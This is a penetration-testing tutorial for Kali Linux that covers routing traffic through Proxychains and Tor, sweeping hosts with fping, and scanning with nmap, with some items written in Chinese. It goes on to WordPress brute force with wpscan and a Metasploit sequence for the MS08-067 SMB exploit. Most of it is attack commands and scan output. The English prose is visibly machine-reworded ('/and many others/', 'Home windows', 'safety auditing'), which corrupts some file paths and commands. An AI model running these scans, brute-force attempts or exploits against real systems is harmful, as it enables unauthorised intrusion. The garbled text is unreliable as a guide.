Kali Linux is a Debian-based Linux distribution geared toward superior Penetration Testing and Safety Auditing. Kali incorporates a number of hundred instruments that are geared in direction of varied data safety duties, similar to Penetration Testing, Safety analysis, Laptop Forensics and Reverse Engineering.
- KALI
- Parrot : Debian primarily based – https://www.parrotsec.org/
- Athena : BlackArch – https://github.com/Athena-OS
1. Use Proxychains and Tor to Go to Web
1.1 Configure Proxychains
root@Kali:~# vi /and many others/proxychains.confYou possibly can select between dynamic_chain, stric_chain or random_chaim. Dynamic_chain shall be most popular.
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The choice beneath identifies how the ProxyList is handled.
# just one choice must be uncommented at time,
# in any other case the final showing choice shall be accepted
#
dynamic_chain
#
# Dynamic - Every connection shall be executed by way of chained proxies
# all proxies chained within the order as they seem within the checklist
# not less than one proxy should be on-line to play in chain
# (lifeless proxies are skipped)
# in any other case EINTR is returned to the app
#
#strict_chain
#
# Strict - Every connection shall be executed by way of chained proxies
# all proxies chained within the order as they seem within the checklist
# all proxies should be on-line to play in chain
# in any other case EINTR is returned to the app
#
#random_chain
#
# Random - Every connection shall be executed by way of random proxy
# (or proxy chain, see chain_len) from the checklist.
# this feature is nice to check your IDS :)You can also append a few of your identified proxy server checklist on the finish of proxychains.conf file.
# ProxyList format
# kind host port [user pass]
# (values separated by 'tab' or 'clean')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy sorts: http, socks4, socks5
# ( auth sorts supported: "fundamental"-http "person/cross"-socks )
#
[ProxyList]
# add proxy right here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 98.26.2.3 1893
socks5 76.22.86.10 1658
1.2 Set up Tor
You will have so as to add an accurate model supply into /and many others/apt/sorces.checklist file. Else your set up will fail.
echo "deb http://http.kali.org/kali kali-rolling primary contrib non-free" > /and many others/apt/sources.checklist && apt-get replace && apt-get set up tor -y && apt autoremove -y
1.3 Use Proxychains to entry Web
You possibly can run a nmap scan utilizing Proxychains which can power the scan to run via one of many proxies in your checklist by typing within the following command into terminal:
proxychains nmap scanme.nmap.org
You can even take a look at Proxychains with Firefox:
proxychains firefox www.duckduckgo.com
proxychains curl icanhazip.com
YouTube Video:
Utilizing proxychains to begin msfconsole:
root@kali:~# proxychains msfconsole
ProxyChains-3.1 (http://proxychains.sf.web)
|DNS-request| 0.0.0.0
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: 0.0.0.0 will not be exist
, ,
/
((__---,,,---__))
(_) O O (_)_________
_ / |
o_o M S F |
_____ | *
||| WW |||
||| |||
Bored with typing 'set RHOSTS'? Click on & pwn with Metasploit Professional
-- kind 'go_pro' to launch it now.
=[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0]
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops
msf >2. Discover alive machines in target network
root@kali:~# fping -g -r 0 -s 192.168.2.0/24 | grep alive 192.168.2.1 is alive 192.168.2.2 is alive 192.168.2.4 is alive 192.168.2.31 is alive 192.168.2.50 is alive 192.168.2.200 is alive 254 targets 6 alive 248 unreachable 0 unknown addresses 248 timeouts (waiting for response) 254 ICMP Echos sent 6 ICMP Echo Replies received 0 other ICMP received 4.49 ms (min round trip time) 4.92 ms (avg round trip time) 5.14 ms (max round trip time) 3.288 sec (elapsed real time)
3. Use Nmap to scan targets
3.1 扫描单个目标地址
nmap 192.168.0.100
3.2 扫描多个目标地址
nmap 192.168.0.100 192.168.0.105
3.3 扫描一个范围内的目标地址
nmap 192.168.0.100-110
3.4 扫描目标地址所在的某个网段
nmap 192.168.0.0/24
3.5 扫描主机列表targets.txt中的所有目标地址
nmap -iL d:targets.txt
3.6 扫描除某一个目标地址之外的所有目标地址
nmap 192.168.0.0/24 -exclude 192.168.109.105
3.7 扫描除某一文件中的目标地址之外的目标地址
nmap 192.168.0.0/24 -excludefile d:targets.txt
3.8 扫描某一目标地址的21、22、23、80端口
nmap 192.168.0.100 -p 21,22,23,80
3.9 对目标地址进行路由跟踪
nmap –traceroute 192.168.0.105
3.10 扫描目标地址所在C段的在线情况
nmap -sP 192.168.0.0/24
3.11 目标地址的操作系统指纹识别
nmap -O 192.168.0.105
3.12 目标地址提供的服务版本检测
nmap -sV 192.168.0.105
3.13 探测防火墙状态
在实战中,可以利用FIN扫描的方式探测防火墙的状态。FIN扫描用于识别端口是否关闭,收到RST回复说明该端口关闭,否则就是open或filtered状态。
nmap -sF -T4 192.168.0.105
3.14 鉴权扫描: 使用–script=auth可以对目标主机或目标主机所在的网段进行应用弱口令检测
nmap –script=auth 192.168.0.105
3.15 暴力破解攻击: nmap具有暴力破解的功能,可对数据库、SMB、SNMP等进行简单密码的暴力猜解
nmap –script=brute 192.168.0.105
3.16 扫描常见的漏洞: nmap具有漏洞扫描的功能,可以检查目标主机或网段是否存在常见的漏洞
nmap –script=vuln 192.168.0.105
3.17 应用服务扫描: nmap具备很多常见应用服务的扫描脚本,例如VNC服务、MySQL服务、Telnet服务、Rsync服务等,以VNC服务为例
nmap –script=realvnc-auth-bypass 192.168.0.105
3.18 探测局域网内更多服务开启的情况:
nmap -n -p 445 –script=broadcast 192.168.0.105
3.19 whois解析: 利用第三方的数据库或资源查询目标地址的信息,例如进行whois解析
nmap -script external baidu.com
root@kali:~# nmap -T4 -O 192.168.2.31 192.168.2.200
Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-19 21:35 EST
Nmap scan report for 192.168.2.31
Host is up (0.31s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
7070/tcp open realserver
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Nmap scan report for 192.168.2.200
Host is up (0.12s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
514/tcp filtered shell
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (97%), Linux 4.4 (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 136.89 seconds
root@kali:~#
4. MSF – Metaspoit
4.1 Basic Usage and Steps
- search smb
- use exploit/windows/smb/ms08_067_netapi
- show options
- set RHOST 192.168.230.145
- set target 41
- exploit
4.2 YouTube – Kali Metasploit Exploit FTP Service on VSFTPD:
4.3 YouTube – Kali Metasploit Exploit Samba Service:
4.4. wpscan to assault WordPress
Use wpscan to begin a easy assault WordPress web site
root@localhost:~# wpscan -u 10.94.200.81
checklist wordpress person
root@localhost:~# wpscan -u 10.94.200.81 -e u vp
Use wordlist to brute power WordPress account
root@localhost:~# wpscan -u 10.94.200.81 -e u –wordlist /usr/share/wordlists/metasploit/common-roots.txt
Youtube Video:
4.5. Exploit Home windows 7 or Home windows 2008 Servers
YouTube video: Utilizing EternalBlue Vulnerability to Exploit Home windows 2008 Server
